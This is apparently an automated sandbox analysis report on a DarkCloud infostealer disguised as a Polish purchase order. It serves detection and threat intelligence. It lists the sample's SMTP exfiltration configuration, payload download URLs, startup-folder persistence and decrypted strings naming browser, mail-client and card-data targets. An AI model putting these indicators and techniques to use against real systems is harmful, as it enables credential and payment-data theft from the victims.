Edit tour

Windows Analysis Report
PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe

Overview

General Information

Sample name:	PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe renamed because original name is a hash value
Original sample name:	PO-Zamwienie zakupu-8837837849-pl-.exe
Analysis ID:	1541129
MD5:	934ab81ba50dcd526fee8d8efbb7a216
SHA1:	7e2e6ab92ba2f6158db445daf27df591ae9744bd
SHA256:	11d1a478267e0ab5df63bcadadae555c683c94e66df9de87084407c48d439519
Infos:

Detection

DarkCloud

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Malicious sample detected (through community Yara rule)

Sigma detected: Drops script at startup location

Yara detected AntiVM3

Yara detected DarkCloud

Yara detected Generic Dropper

.NET source code contains method to dynamically call methods (often used by packers)

.NET source code contains potential unpacker

AI detected suspicious sample

Drops VBS files to the startup folder

Machine Learning detection for dropped file

Machine Learning detection for sample

Sample uses string decryption to hide its real strings

Sigma detected: WScript or CScript Dropper

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Tries to harvest and steal browser information (history, passwords, etc)

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Writes or reads registry keys via WMI

Yara detected Costura Assembly Loader

Allocates memory with a write watch (potentially for evading sandboxes)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates a start menu entry (Start Menu\Programs\Startup)

Detected potential crypto function

Drops PE files

Enables debug privileges

Found WSH timer for Javascript or VBS script (likely evasive script)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

HTTP GET or POST without a user agent

IP address seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May check the online IP address of the machine

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

Queries the volume information (name, serial number etc) of a device

Sample file is different than original file name gathered from version info

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Stores files to the Windows start menu directory

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Yara signature match

Classification

Process Tree

System is w10x64

PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe (PID: 5760 cmdline: "C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe" MD5: 934AB81BA50DCD526FEE8D8EFBB7A216)

InstallUtil.exe (PID: 3228 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe" MD5: 5D4073B2EB6D217C19F2B22F21BF8D57)

wscript.exe (PID: 5972 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\FieldNames.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)

FieldNames.exe (PID: 1272 cmdline: "C:\Users\user\AppData\Roaming\FieldNames.exe" MD5: 934AB81BA50DCD526FEE8D8EFBB7A216)

InstallUtil.exe (PID: 7108 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe" MD5: 5D4073B2EB6D217C19F2B22F21BF8D57)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
DarkCloud Stealer	Stealer is written in Visual Basic.	No Attribution	https://asec.ahnlab.com/en/53128/ https://c3rb3ru5d3d53c.github.io/malware-blog/darkcloud-stealer/	https://malpedia.caad.fkie.fraunhofer.de/details/win.darkcloud

Malware Configuration

Threatname: DarkCloud

{"Exfil Mode": "SMTP", "To Address": "info@asterilpanel.com", "From Address": "purchase01.qualitydevlopments@gmail.com"}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
00000007.00000002.3304177579.0000000000401000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_DarkCloud	Yara detected DarkCloud	Joe Security
00000006.00000002.2306805654.0000000004018000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DarkCloud	Yara detected DarkCloud	Joe Security
00000006.00000002.2306805654.0000000004018000.00000004.00000800.00020000.00000000.sdmp	LokiBot_Dropper_Packed_R11_Feb18	Auto-generated rule - file scan copy.pdf.r11	Florian Roth	0x3834:$s1: C:\Program Files (x86)\Microsoft Visual Studio\VB98\VB6.OLB
00000006.00000002.2306805654.00000000044D7000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
00000000.00000002.2112093538.00000000030AC000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
00000000.00000002.2118042555.000000000412F000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DarkCloud	Yara detected DarkCloud	Joe Security
00000000.00000002.2118042555.000000000412F000.00000004.00000800.00020000.00000000.sdmp	LokiBot_Dropper_Packed_R11_Feb18	Auto-generated rule - file scan copy.pdf.r11	Florian Roth	0x3e534:$s1: C:\Program Files (x86)\Microsoft Visual Studio\VB98\VB6.OLB
00000000.00000002.2123637208.0000000006D80000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
00000006.00000002.2288985162.0000000002E9C000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
00000000.00000002.2118042555.00000000045DF000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
00000000.00000002.2118042555.0000000004227000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DarkCloud	Yara detected DarkCloud	Joe Security
Process Memory Space: PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe PID: 5760	JoeSecurity_DarkCloud	Yara detected DarkCloud	Joe Security
Process Memory Space: PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe PID: 5760	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
Process Memory Space: PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe PID: 5760	JoeSecurity_GenericDropper	Yara detected Generic Dropper	Joe Security
Process Memory Space: PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe PID: 5760	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: FieldNames.exe PID: 1272	JoeSecurity_DarkCloud	Yara detected DarkCloud	Joe Security
Process Memory Space: FieldNames.exe PID: 1272	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
Process Memory Space: FieldNames.exe PID: 1272	JoeSecurity_GenericDropper	Yara detected Generic Dropper	Joe Security
Process Memory Space: FieldNames.exe PID: 1272	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: InstallUtil.exe PID: 7108	JoeSecurity_DarkCloud	Yara detected DarkCloud	Joe Security
Click to see the 15 entries

Unpacked PEs

Source	Rule	Description	Author
6.2.FieldNames.exe.44d74f8.12.raw.unpack	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
0.2.PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe.41695f0.5.raw.unpack	JoeSecurity_DarkCloud	Yara detected DarkCloud	Joe Security
0.2.PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe.41695f0.5.unpack	JoeSecurity_DarkCloud	Yara detected DarkCloud	Joe Security
0.2.PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe.46e74f8.2.raw.unpack	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
0.2.PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe.6d80000.16.raw.unpack	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security

Sigma Signatures

System Summary

Sigma detected: WScript or CScript Dropper

Source: Process started

Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\FieldNames.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\FieldNames.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\FieldNames.vbs" , ProcessId: 5972, ProcessName: wscript.exe

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Source: Process started

Author: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\FieldNames.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\FieldNames.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\FieldNames.vbs" , ProcessId: 5972, ProcessName: wscript.exe

Data Obfuscation

Sigma detected: Drops script at startup location

Source: File created

Author: Joe Security: Data: EventID: 11, Image: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe, ProcessId: 5760, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\FieldNames.vbs

Suricata Signatures

ETPRO MALWARE Common Downloader Header Pattern UH

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-24T13:40:17.069509+0200	2803274	2	Potentially Bad Traffic	192.168.2.5	49705	162.55.60.2	80	TCP
2024-10-24T13:40:39.679224+0200	2803274	2	Potentially Bad Traffic	192.168.2.5	49800	162.55.60.2	80	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Found malware configuration

Source: 0.2.PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe.41695f0.5.raw.unpack

Malware Configuration Extractor: DarkCloud {"Exfil Mode": "SMTP", "To Address": "info@asterilpanel.com", "From Address": "purchase01.qualitydevlopments@gmail.com"}

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Roaming\FieldNames.exe

Joe Sandbox ML: detected

Machine Learning detection for sample

Source: PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe

Joe Sandbox ML: detected

Sample uses string decryption to hide its real strings

Source: 0.2.PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe.41695f0.5.unpack	String decryptor: Cookies
Source: 0.2.PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe.41695f0.5.unpack	String decryptor: \Default\Login Data
Source: 0.2.PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe.41695f0.5.unpack	String decryptor: \Login Data
Source: 0.2.PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe.41695f0.5.unpack	String decryptor: //setting[@name='Password']/value
Source: 0.2.PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe.41695f0.5.unpack	String decryptor: Password :
Source: 0.2.PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe.41695f0.5.unpack	String decryptor: Software\Martin Prikryl\WinSCP 2\Sessions
Source: 0.2.PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe.41695f0.5.unpack	String decryptor: Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Source: 0.2.PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe.41695f0.5.unpack	String decryptor: Software\Microsoft\Windows Messaging Subsystem\Profiles\9375CFF0413111d3B88A00104B2A6676
Source: 0.2.PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe.41695f0.5.unpack	String decryptor: SMTP Email Address
Source: 0.2.PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe.41695f0.5.unpack	String decryptor: NNTP Email Address
Source: 0.2.PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe.41695f0.5.unpack	String decryptor: Email
Source: 0.2.PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe.41695f0.5.unpack	String decryptor: HTTPMail User Name
Source: 0.2.PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe.41695f0.5.unpack	String decryptor: HTTPMail Server
Source: 0.2.PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe.41695f0.5.unpack	String decryptor: ^([a-zA-Z0-9_\-\.]+)@([a-zA-Z0-9_\-\.]+)\.([a-zA-Z]{2,5})$
Source: 0.2.PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe.41695f0.5.unpack	String decryptor: Password
Source: 0.2.PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe.41695f0.5.unpack	String decryptor: ^(?!:\/\/)([a-zA-Z0-9-_]+\.)[a-zA-Z0-9][a-zA-Z0-9-_]+\.[a-zA-Z]{2,11}?$
Source: 0.2.PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe.41695f0.5.unpack	String decryptor: ^3[47][0-9]{13}$
Source: 0.2.PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe.41695f0.5.unpack	String decryptor: ^(6541\|6556)[0-9]{12}$
Source: 0.2.PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe.41695f0.5.unpack	String decryptor: ^389[0-9]{11}$
Source: 0.2.PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe.41695f0.5.unpack	String decryptor: ^3(?:0[0-5]\|[68][0-9])[0-9]{11}$
Source: 0.2.PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe.41695f0.5.unpack	String decryptor: ^63[7-9][0-9]{13}$
Source: 0.2.PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe.41695f0.5.unpack	String decryptor: ^(?:2131\|1800\|35\\d{3})\\d{11}$
Source: 0.2.PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe.41695f0.5.unpack	String decryptor: ^9[0-9]{15}$
Source: 0.2.PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe.41695f0.5.unpack	String decryptor: ^(6304\|6706\|6709\|6771)[0-9]{12,15}$
Source: 0.2.PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe.41695f0.5.unpack	String decryptor: ^(5018\|5020\|5038\|6304\|6759\|6761\|6763)[0-9]{8,15}$
Source: 0.2.PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe.41695f0.5.unpack	String decryptor: Mastercard
Source: 0.2.PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe.41695f0.5.unpack	String decryptor: ^(6334\|6767)[0-9]{12}\|(6334\|6767)[0-9]{14}\|(6334\|6767)[0-9]{15}$
Source: 0.2.PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe.41695f0.5.unpack	String decryptor: ^(62[0-9]{14,17})$
Source: 0.2.PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe.41695f0.5.unpack	String decryptor: ^(4903\|4905\|4911\|4936\|6333\|6759)[0-9]{12}\|(4903\|4905\|4911\|4936\|6333\|6759)[0-9]{14}\|(4903\|4905\|4911\|4936\|6333\|6759)[0-9]{15}\|564182[0-9]{10}\|564182[0-9]{12}\|564182[0-9]{13}\|633110[0-9]{10}\|633110[0-9]{12}\|633110[0-9]{13}$
Source: 0.2.PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe.41695f0.5.unpack	String decryptor: Visa Card
Source: 0.2.PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe.41695f0.5.unpack	String decryptor: ^(?:4[0-9]{12}(?:[0-9]{3})?\|5[1-5][0-9]{14})$
Source: 0.2.PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe.41695f0.5.unpack	String decryptor: Visa Master Card
Source: 0.2.PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe.41695f0.5.unpack	String decryptor: mail\
Source: 0.2.PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe.41695f0.5.unpack	String decryptor: Foxmail.exe
Source: 0.2.PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe.41695f0.5.unpack	String decryptor: \Accounts\Account.rec0
Source: 0.2.PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe.41695f0.5.unpack	String decryptor: \AccCfg\Accounts.tdat
Source: 0.2.PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe.41695f0.5.unpack	String decryptor: EnableSignature
Source: 0.2.PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe.41695f0.5.unpack	String decryptor: Application : FoxMail
Source: 0.2.PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe.41695f0.5.unpack	String decryptor: encryptedUsername
Source: 0.2.PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe.41695f0.5.unpack	String decryptor: logins
Source: 0.2.PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe.41695f0.5.unpack	String decryptor: encryptedPassword
Source: 0.2.PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe.41695f0.5.unpack	String decryptor: purchase01.qualitydevlopments@gmail.com
Source: 0.2.PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe.41695f0.5.unpack	String decryptor: http://schemas.microsoft.com/cdo/configuration/smtpserver
Source: 0.2.PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe.41695f0.5.unpack	String decryptor: http://schemas.microsoft.com/cdo/configuration/smtpserverport
Source: 0.2.PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe.41695f0.5.unpack	String decryptor: http://schemas.microsoft.com/cdo/configuration/smtpusessl
Source: 0.2.PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe.41695f0.5.unpack	String decryptor: http://schemas.microsoft.com/cdo/configuration/sendusername
Source: 0.2.PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe.41695f0.5.unpack	String decryptor: http://schemas.microsoft.com/cdo/configuration/sendpassword

Source: PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: unknown	HTTPS traffic detected: 188.132.193.46:443 -> 192.168.2.5:49704 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.132.193.46:443 -> 192.168.2.5:49717 version: TLS 1.2

Source: PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe, 00000000.00000002.2112093538.000000000342B000.00000004.00000800.00020000.00000000.sdmp, PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe, 00000000.00000002.2118042555.0000000004068000.00000004.00000800.00020000.00000000.sdmp, PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe, 00000000.00000002.2118042555.00000000047E9000.00000004.00000800.00020000.00000000.sdmp, PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe, 00000000.00000002.2124472344.0000000006FD0000.00000004.08000000.00040000.00000000.sdmp, FieldNames.exe, 00000006.00000002.2288985162.000000000321E000.00000004.00000800.00020000.00000000.sdmp, FieldNames.exe, 00000006.00000002.2306805654.0000000003EA7000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: W.pdb4 source: PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe, 00000000.00000002.2118042555.000000000412F000.00000004.00000800.00020000.00000000.sdmp, PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe, 00000000.00000002.2112093538.0000000003539000.00000004.00000800.00020000.00000000.sdmp, PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe, 00000000.00000002.2118042555.0000000004227000.00000004.00000800.00020000.00000000.sdmp, FieldNames.exe, 00000006.00000002.2306805654.0000000004018000.00000004.00000800.00020000.00000000.sdmp, FieldNames.exe, 00000006.00000002.2288985162.0000000003317000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.3304177579.000000000045B000.00000040.00000400.00020000.00000000.sdmp
Source:	Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe, 00000000.00000002.2112093538.000000000342B000.00000004.00000800.00020000.00000000.sdmp, PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe, 00000000.00000002.2118042555.0000000004068000.00000004.00000800.00020000.00000000.sdmp, PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe, 00000000.00000002.2118042555.00000000047E9000.00000004.00000800.00020000.00000000.sdmp, PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe, 00000000.00000002.2124472344.0000000006FD0000.00000004.08000000.00040000.00000000.sdmp, FieldNames.exe, 00000006.00000002.2288985162.000000000321E000.00000004.00000800.00020000.00000000.sdmp, FieldNames.exe, 00000006.00000002.2306805654.0000000003EA7000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: protobuf-net.pdbSHA256}Lq source: PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe, 00000000.00000002.2123399550.0000000006CB0000.00000004.08000000.00040000.00000000.sdmp, PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe, 00000000.00000002.2118042555.00000000047E9000.00000004.00000800.00020000.00000000.sdmp, PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe, 00000000.00000002.2118042555.00000000045DF000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: protobuf-net.pdb source: PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe, 00000000.00000002.2123399550.0000000006CB0000.00000004.08000000.00040000.00000000.sdmp, PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe, 00000000.00000002.2118042555.00000000047E9000.00000004.00000800.00020000.00000000.sdmp, PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe, 00000000.00000002.2118042555.00000000045DF000.00000004.00000800.00020000.00000000.sdmp

Source: global traffic	HTTP traffic detected: GET /ruurew/Cwfuvfaf.wav HTTP/1.1Host: erkasera.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /ruurew/Cwfuvfaf.wav HTTP/1.1Host: erkasera.comConnection: Keep-Alive

Source: Joe Sandbox View

IP Address: 162.55.60.2 162.55.60.2

Source: Joe Sandbox View

JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e

Source: unknown

DNS query: name: showip.net

Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49705 -> 162.55.60.2:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49800 -> 162.55.60.2:80

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Code function: 7_2_004329F0 InternetOpenA,InternetOpenUrlA,InternetReadFile,

7_2_004329F0

Source: global traffic	HTTP traffic detected: GET /ruurew/Cwfuvfaf.wav HTTP/1.1Host: erkasera.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /ruurew/Cwfuvfaf.wav HTTP/1.1Host: erkasera.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Project1Host: showip.net
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Project1Host: showip.net

Source: global traffic	DNS traffic detected: DNS query: erkasera.com
Source: global traffic	DNS traffic detected: DNS query: showip.net

Source: PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe, FieldNames.exe.0.dr	String found in binary or memory: http://127.0.0.1:
Source: PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe, 00000000.00000002.2112093538.0000000003061000.00000004.00000800.00020000.00000000.sdmp, FieldNames.exe, 00000006.00000002.2288985162.0000000002E51000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: InstallUtil.exe, 00000002.00000002.3305635075.0000000000A97000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.3305781323.0000000000CC6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://showip.net
Source: InstallUtil.exe, 00000007.00000002.3305781323.0000000000CC6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://showip.net#
Source: InstallUtil.exe, 00000002.00000002.3305635075.0000000000AC1000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.3305635075.0000000000A97000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.3305781323.0000000000CC6000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.3305781323.0000000000C78000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.3305781323.0000000000CDC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://showip.net/
Source: InstallUtil.exe, 00000007.00000002.3306652645.0000000000D0F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://showip.net/#(
Source: InstallUtil.exe, 00000002.00000002.3306426620.0000000000AD8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://showip.net/%Y
Source: InstallUtil.exe, 00000002.00000002.3305635075.0000000000AC1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://showip.net/;
Source: InstallUtil.exe, 00000002.00000002.3305635075.0000000000A97000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://showip.net/X
Source: InstallUtil.exe, 00000007.00000002.3305781323.0000000000CDC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://showip.net/dF
Source: InstallUtil.exe, 00000007.00000002.3305781323.0000000000CC6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://showip.net/h
Source: InstallUtil.exe, 00000002.00000002.3305635075.0000000000A97000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://showip.netF
Source: InstallUtil.exe, 00000007.00000002.3305781323.0000000000CDC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://showip.neta
Source: InstallUtil.exe, 00000002.00000002.3305635075.0000000000A97000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://showip.netth
Source: PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe, 00000000.00000002.2112093538.0000000003061000.00000004.00000800.00020000.00000000.sdmp, FieldNames.exe, 00000006.00000002.2288985162.0000000002E51000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://erkasera.com
Source: PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe, 00000000.00000002.2112093538.0000000003061000.00000004.00000800.00020000.00000000.sdmp, FieldNames.exe, 00000006.00000002.2288985162.0000000002E51000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://erkasera.com/ruurew/Cwfuvfaf.wav
Source: PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe, FieldNames.exe.0.dr	String found in binary or memory: https://erkasera.com/ruurew/Cwfuvfaf.wav1B4MrP3veGRoRMM0tnPgU/Q==
Source: InstallUtil.exe, 00000007.00000002.3306909563.0000000000D47000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.3307042263.0000000000D5D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://fundingchoicesmessages.google.com/i/pub-8790158038613050?ers=1
Source: PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe, 00000000.00000002.2123399550.0000000006CB0000.00000004.08000000.00040000.00000000.sdmp, PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe, 00000000.00000002.2118042555.00000000047E9000.00000004.00000800.00020000.00000000.sdmp, PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe, 00000000.00000002.2118042555.00000000045DF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/mgravell/protobuf-net
Source: PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe, 00000000.00000002.2123399550.0000000006CB0000.00000004.08000000.00040000.00000000.sdmp, PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe, 00000000.00000002.2118042555.00000000047E9000.00000004.00000800.00020000.00000000.sdmp, PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe, 00000000.00000002.2118042555.00000000045DF000.00000004.00000800.00020000.00000000.sdmp, FieldNames.exe, 00000006.00000002.2306805654.000000000461F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/mgravell/protobuf-netJ
